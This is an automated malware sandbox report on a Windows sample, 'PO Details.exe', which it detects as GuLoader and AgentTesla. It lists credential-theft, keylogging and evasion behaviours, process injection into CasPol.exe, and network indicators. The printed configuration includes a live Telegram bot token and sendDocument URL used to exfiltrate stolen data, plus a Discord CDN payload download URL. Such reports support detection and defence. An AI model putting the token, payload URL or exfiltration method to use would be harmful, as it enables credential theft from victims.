Edit tour

Windows Analysis Report
PO Details.exe

Overview

General Information

Sample Name:	PO Details.exe
Analysis ID:	688673
MD5:	111af5ceb406185d5c636c90292b6a0a
SHA1:	8e5b0aa304a80b01c42f8b755c25ac2cee7b791c
SHA256:	a417b6091524654d2ab0f4893e7d65cd9d35c54063a6865f30d5d3c45a405730
Infos:

Detection

AgentTesla, GuLoader

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Multi AV Scanner detection for submitted file

Yara detected Telegram RAT

Yara detected AgentTesla

Yara detected GuLoader

Snort IDS alert for network traffic

Installs a global keyboard hook

Tries to steal Mail credentials (via file / registry access)

Writes to foreign memory regions

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to detect Any.run

Tries to harvest and steal ftp login credentials

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Uses the Telegram API (likely for C&C communication)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal browser information (history, passwords, etc)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Uses 32bit PE files

Queries the volume information (name, serial number etc) of a device

May sleep (evasive loops) to hinder dynamic analysis

Contains functionality to shutdown / reboot the system

Uses code obfuscation techniques (call, push, ret)

Detected potential crypto function

Found potential string decryption / allocating functions

Sample execution stops while process was sleeping (likely an evasion)

Yara detected Credential Stealer

JA3 SSL client fingerprint seen in connection with other malware

Contains functionality to call native functions

Contains functionality to dynamically determine API calls

Found dropped PE file which has not been started or loaded

HTTP GET or POST without a user agent

IP address seen in connection with other malware

Contains functionality for execution timing, often used to detect debuggers

Contains long sleeps (>= 3 min)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

PE file does not import any functions

Drops PE files

Tries to load missing DLLs

Contains functionality to read the PEB

Uses a known web browser user agent for HTTP communication

Checks if the current process is being debugged

Contains functionality to detect virtual machines (SLDT)

Creates a window with clipboard capturing capabilities

PE / OLE file has an invalid certificate

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Uses Microsoft's Enhanced Cryptographic Provider

Creates a process in suspended mode (likely to inject code)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality for read data from the clipboard

Classification

Process Tree

System is w10x64native

PO Details.exe (PID: 6368 cmdline: "C:\Users\user\Desktop\PO Details.exe" MD5: 111AF5CEB406185D5C636C90292B6A0A)

CasPol.exe (PID: 7416 cmdline: "C:\Users\user\Desktop\PO Details.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

CasPol.exe (PID: 7436 cmdline: "C:\Users\user\Desktop\PO Details.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

CasPol.exe (PID: 7452 cmdline: "C:\Users\user\Desktop\PO Details.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

CasPol.exe (PID: 7460 cmdline: "C:\Users\user\Desktop\PO Details.exe" MD5: 914F728C04D3EDDD5FBA59420E74E56B)

conhost.exe (PID: 7468 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 81CA40085FC75BABD2C91D18AA9FFA68)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Exfil Mode": "Telegram", "Chat id": "5270570406", "Chat URL": "https://api.telegram.org/bot5148862528:AAFsBDgzlwCxy7IXRPbLVrtTngZwRqmNVnM/sendDocument"}

Threatname: Telegram RAT

{"C2 url": "https://api.telegram.org/bot5148862528:AAFsBDgzlwCxy7IXRPbLVrtTngZwRqmNVnM/sendMessage"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
0000000B.00000000.9159098774.0000000000B00000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
00000001.00000002.9298818143.0000000002A80000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
0000000B.00000002.14014971844.000000001D271000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0000000B.00000002.14014971844.000000001D271000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0000000B.00000002.14014971844.000000001D271000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Process Memory Space: CasPol.exe PID: 7460	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: CasPol.exe PID: 7460	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: CasPol.exe PID: 7460	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security
Click to see the 3 entries

Snort Signatures

ETPRO TROJAN Agent Tesla Telegram Exfil - Source IP: 192.168.11.20 - Destination IP: 149.154.167.220

Timestamp:	192.168.11.20149.154.167.220497784432851779 08/23/22-13:22:01.899347
SID:	2851779
Source Port:	49778
Destination Port:	443
Protocol:	TCP
Classtype:	A Network Trojan was detected

HTTP traffic detected: POST /bot5148862528:AAFsBDgzlwCxy7IXRPbLVrtTngZwRqmNVnM/sendDocument HTTP/1.1Content-Type: multipart/form-data; boundary=---------------------------8da850df5a12170Host: api.telegram.orgContent-Length: 1005Expect: 100-continueConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 149.154.167.220 149.154.167.220

Source: global traffic	HTTP traffic detected: GET /attachments/956928735397965906/1011525020427763732/KqRRf17.jpb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/956928735397965906/1011525020427763732/KqRRf17.jpb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49777
Source: unknown	Network traffic detected: HTTP traffic on port 49777 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49778 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49778

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: CasPol.exe, 0000000B.00000002.14015706310.000000001D2C3000.00000004.00000800.00020000.00000000.sdmp

String found in binary or memory: subdomain_match":["go","tv"]},{"applied_policy":"EdgeUA","domain":"video.zhihu.com"},{"applied_policy":"ChromeUA","domain":"la7.it"},{"applied_policy":"ChromeUA","domain":"ide.cs50.io"},{"applied_policy":"ChromeUA","domain":"moneygram.com"},{"applied_policy":"ChromeUA","domain":"blog.esuteru.com"},{"applied_policy":"ChromeUA","domain":"online.tivo.com","path_match":["/start"]},{"applied_policy":"ChromeUA","domain":"smallbusiness.yahoo.com","path_match":["/businessmaker"]},{"applied_policy":"ChromeUA","domain":"jeeready.amazon.in","path_match":["/home"]},{"applied_policy":"ChromeUA","domain":"abc.com"},{"applied_policy":"ChromeUA","domain":"mvsrec738.examly.io"},{"applied_policy":"ChromeUA","domain":"myslate.sixphrase.com"},{"applied_policy":"ChromeUA","domain":"search.norton.com","path_match":["/nsssOnboarding"]},{"applied_policy":"ChromeUA","domain":"checkdecide.com"},{"applied_policy":"ChromeUA","domain":"virtualvisitlogin.partners.org"},{"applied_policy":"ChromeUA","domain":"carelogin.bryantelemedicine.com"},{"applied_policy":"ChromeUA","domain":"providerstc.hs.utah.gov"},{"applied_policy":"ChromeUA","domain":"applychildcaresubsidy.alberta.ca"},{"applied_policy":"ChromeUA","domain":"elearning.evn.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"telecare.keckmedicine.org"},{"applied_policy":"ChromeUA","domain":"authoring.amirsys.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"elearning.seabank.com.vn","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"app.fields.corteva.com","path_match":["/login"]},{"applied_policy":"ChromeUA","domain":"gsq.minornet.com"},{"applied_policy":"ChromeUA","domain":"shop.lic.co.nz"},{"applied_policy":"ChromeUA","domain":"telehealthportal.uofuhealth.org"},{"applied_policy":"ChromeUA","domain":"portal.centurylink.com"},{"applied_policy":"ChromeUA","domain":"visitnow.org"},{"applied_policy":"ChromeUA","domain":"www.hotstar.com","path_match":["/in/subscribe/payment/methods/dc","/in/subscribe/payment/methods/cc"]},{"applied_policy":"ChromeUA","domain":"tryca.st","path_match":["/studio","/publisher"]},{"applied_policy":"ChromeUA","domain":"telemost.yandex.ru"},{"applied_policy":"ChromeUA","domain":"astrogo.astro.com.my"},{"applied_policy":"ChromeUA","domain":"airbornemedia.gogoinflight.com"},{"applied_policy":"ChromeUA","domain":"itoaxaca.mindbox.app"},{"applied_policy":"ChromeUA","domain":"app.classkick.com"},{"applied_policy":"ChromeUA","domain":"exchangeservicecenter.com","path_match":["/freeze"]},{"applied_policy":"ChromeUA","domain":"bancodeoccidente.com.co","path_match":["/portaltransaccional"]},{"applied_policy":"ChromeUA","domain":"better.com"},{"applied_policy":"IEUA","domain":"bm.gzekao.cn","path_match":["/tr/webregister/"]},{"applied_policy":"ChromeUA","domain":"scheduling.care.psjhealth.org","path_match":["/virtual"]},{"applied_policy":"ChromeUA","domain":"salud.go.cr"},{"applied_policy":"ChromeUA","domain":"learning.chungdahm.com"},{"applied_policy":"C

Source: CasPol.exe, 0000000B.00000002.14014971844.000000001D271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: CasPol.exe, 0000000B.00000002.14014971844.000000001D271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://DynDns.comDynDNSnamejidpasswordPsi/Psi
Source: CasPol.exe, 0000000B.00000002.14017146437.000000001D382000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://WE6eWVYUK6.co
Source: CasPol.exe, 0000000B.00000003.9327075567.000000001C101000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.14017146437.000000001D382000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.14017473743.000000001D39E000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.14017700915.000000001D3B8000.00000004.00000800.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.14014971844.000000001D271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://WE6eWVYUK6.com
Source: CasPol.exe, 0000000B.00000002.14017700915.000000001D3B8000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://api.telegram.org
Source: PO Details.exe, 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmp, lang-1038.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: lang-1038.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: lang-1038.dll.1.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: CasPol.exe, 0000000B.00000002.13996817255.0000000000FAE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://cdn.discordapp.com/attachments/956928735397965906/1011525020427763732/KqRRf17.jpb
Source: CasPol.exe, 0000000B.00000003.9274836776.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.13997805717.0000000001001000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: CasPol.exe, 0000000B.00000003.9274836776.0000000000FEE000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: PO Details.exe, 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmp, lang-1038.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: lang-1038.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: lang-1038.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: lang-1038.dll.1.dr	String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: PO Details.exe, 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmp, lang-1038.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: lang-1038.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: lang-1038.dll.1.dr	String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: PO Details.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: PO Details.exe, 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmp, lang-1038.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: lang-1038.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0N
Source: lang-1038.dll.1.dr	String found in binary or memory: http://ocsp.digicert.com0O
Source: CasPol.exe, 0000000B.00000002.14017532230.000000001D3A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: CasPol.exe, 0000000B.00000002.14014971844.000000001D271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://vDnRAK.com
Source: lang-1038.dll.1.dr	String found in binary or memory: http://www.avast.com0/
Source: lang-1038.dll.1.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: CasPol.exe, 0000000B.00000002.14014971844.000000001D271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org%%startupfolder%
Source: CasPol.exe, 0000000B.00000002.14014971844.000000001D271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ipify.org%t-
Source: CasPol.exe, 0000000B.00000002.14017532230.000000001D3A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: CasPol.exe, 0000000B.00000002.14017532230.000000001D3A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5148862528:AAFsBDgzlwCxy7IXRPbLVrtTngZwRqmNVnM/sendDocument
Source: CasPol.exe, 0000000B.00000002.14014971844.000000001D271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot5148862528:AAFsBDgzlwCxy7IXRPbLVrtTngZwRqmNVnM/sendDocumentdocument-----
Source: CasPol.exe, 0000000B.00000002.13996125718.0000000000F6E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/
Source: CasPol.exe, 0000000B.00000002.13996940991.0000000000FB6000.00000004.00000020.00020000.00000000.sdmp, CasPol.exe, 0000000B.00000002.13996622551.0000000000F9F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cdn.discordapp.com/attachments/956928735397965906/1011525020427763732/KqRRf17.jpb
Source: CasPol.exe, 0000000B.00000002.14016430930.000000001D320000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/
Source: CasPol.exe, 0000000B.00000002.14016430930.000000001D320000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com//
Source: CasPol.exe, 0000000B.00000002.14016430930.000000001D320000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/https://login.live.com/
Source: CasPol.exe, 0000000B.00000002.14016430930.000000001D320000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com/v104
Source: CasPol.exe, 0000000B.00000002.14016430930.000000001D320000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
Source: PO Details.exe, 00000001.00000002.9296649258.000000000040A000.00000004.00000001.01000000.00000003.sdmp, lang-1038.dll.1.dr	String found in binary or memory: https://www.digicert.com/CPS0
Source: CasPol.exe, 0000000B.00000002.14014971844.000000001D271000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www

Source: unknown

DNS traffic detected: queries for: cdn.discordapp.com

Source: global traffic	HTTP traffic detected: GET /attachments/956928735397965906/1011525020427763732/KqRRf17.jpb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: cdn.discordapp.comConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /attachments/956928735397965906/1011525020427763732/KqRRf17.jpb HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like GeckoHost: cdn.discordapp.comCache-Control: no-cache

Source: unknown	HTTPS traffic detected: 162.159.130.233:443 -> 192.168.11.20:49777 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49778 version: TLS 1.2

Key, Mouse, Clipboard, Microphone and Screen Capturing

Installs a global keyboard hook

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Windows user hook set: 0 keyboard low level C:\Windows\Microsoft.NET\Framework\v4.0.30319\caspol.exe

Jump to behavior

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Source: C:\Users\user\Desktop\PO Details.exe

Code function: 1_2_004055B8 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

1_2_004055B8

Source: PO Details.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE

Source: C:\Users\user\Desktop\PO Details.exe

Code function: 1_2_004034C5 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,

1_2_004034C5

Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_00407458	1_2_00407458
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_00406C81	1_2_00406C81
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_6E491B5F	1_2_6E491B5F
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A8F980	1_2_02A8F980
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A91137	1_2_02A91137
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A80EA2	1_2_02A80EA2
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A8069C	1_2_02A8069C
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A80EEB	1_2_02A80EEB
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A812F8	1_2_02A812F8
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A8A6F9	1_2_02A8A6F9
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A806F4	1_2_02A806F4
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A802F7	1_2_02A802F7
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A832C4	1_2_02A832C4
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A812DD	1_2_02A812DD
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A866D6	1_2_02A866D6
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A80220	1_2_02A80220
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A80A23	1_2_02A80A23
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A87E38	1_2_02A87E38
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A8063D	1_2_02A8063D
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A80E08	1_2_02A80E08
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A87201	1_2_02A87201
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A81213	1_2_02A81213
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A87261	1_2_02A87261
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A92E65	1_2_02A92E65
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A86A70	1_2_02A86A70
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A80E42	1_2_02A80E42
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A86E59	1_2_02A86E59
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A8025F	1_2_02A8025F
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A81256	1_2_02A81256
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A803A0	1_2_02A803A0
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A813A0	1_2_02A813A0
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A80BA5	1_2_02A80BA5
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A80F8E	1_2_02A80F8E
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A80798	1_2_02A80798
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A87B97	1_2_02A87B97
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A80FEC	1_2_02A80FEC
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A813EF	1_2_02A813EF
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A807E2	1_2_02A807E2
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A867CC	1_2_02A867CC
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A87BCD	1_2_02A87BCD
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A86735	1_2_02A86735
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A83336	1_2_02A83336
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A92308	1_2_02A92308
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A89F0A	1_2_02A89F0A
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A8AB04	1_2_02A8AB04
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A8074A	1_2_02A8074A
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A8034C	1_2_02A8034C
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A80F45	1_2_02A80F45
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A80B5D	1_2_02A80B5D
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A92CAD	1_2_02A92CAD
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A80CA2	1_2_02A80CA2
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A868BE	1_2_02A868BE
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A800B5	1_2_02A800B5
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A8088C	1_2_02A8088C
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A8048F	1_2_02A8048F
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A808E2	1_2_02A808E2
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A864F0	1_2_02A864F0
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A8A0F1	1_2_02A8A0F1
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A804F7	1_2_02A804F7
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A814F7	1_2_02A814F7
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A810CC	1_2_02A810CC
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A81030	1_2_02A81030
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A80833	1_2_02A80833
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A85833	1_2_02A85833
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A86837	1_2_02A86837
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A8640D	1_2_02A8640D
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A80C01	1_2_02A80C01
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A80005	1_2_02A80005
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A80407	1_2_02A80407
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A8006A	1_2_02A8006A
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A81074	1_2_02A81074
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A80442	1_2_02A80442
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A9305C	1_2_02A9305C
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A81452	1_2_02A81452
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A80C55	1_2_02A80C55
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A80DAD	1_2_02A80DAD
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A91DBB	1_2_02A91DBB
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A86595	1_2_02A86595
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A805FA	1_2_02A805FA
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A939FA	1_2_02A939FA
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A801C8	1_2_02A801C8
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A811CD	1_2_02A811CD
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A809C3	1_2_02A809C3
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A809C7	1_2_02A809C7
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A8112A	1_2_02A8112A
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A87D06	1_2_02A87D06
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A8091A	1_2_02A8091A
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A80117	1_2_02A80117
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A81178	1_2_02A81178
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A80175	1_2_02A80175
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A80549	1_2_02A80549
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A86940	1_2_02A86940
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A80D46	1_2_02A80D46
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A80D50	1_2_02A80D50
Source: C:\Users\user\Desktop\PO Details.exe	Code function: 1_2_02A81554	1_2_02A81554
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00A43038	11_2_00A43038
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00A40040	11_2_00A40040
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00A43D88	11_2_00A43D88
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00A4F3E8	11_2_00A4F3E8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00A48A09	11_2_00A48A09
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00B1108D	11_2_00B1108D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_00B11039	11_2_00B11039
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_1D119890	11_2_1D119890
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_1D116B62	11_2_1D116B62
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe	Code function: 11_2_1D11A160	11_2_1D11A160
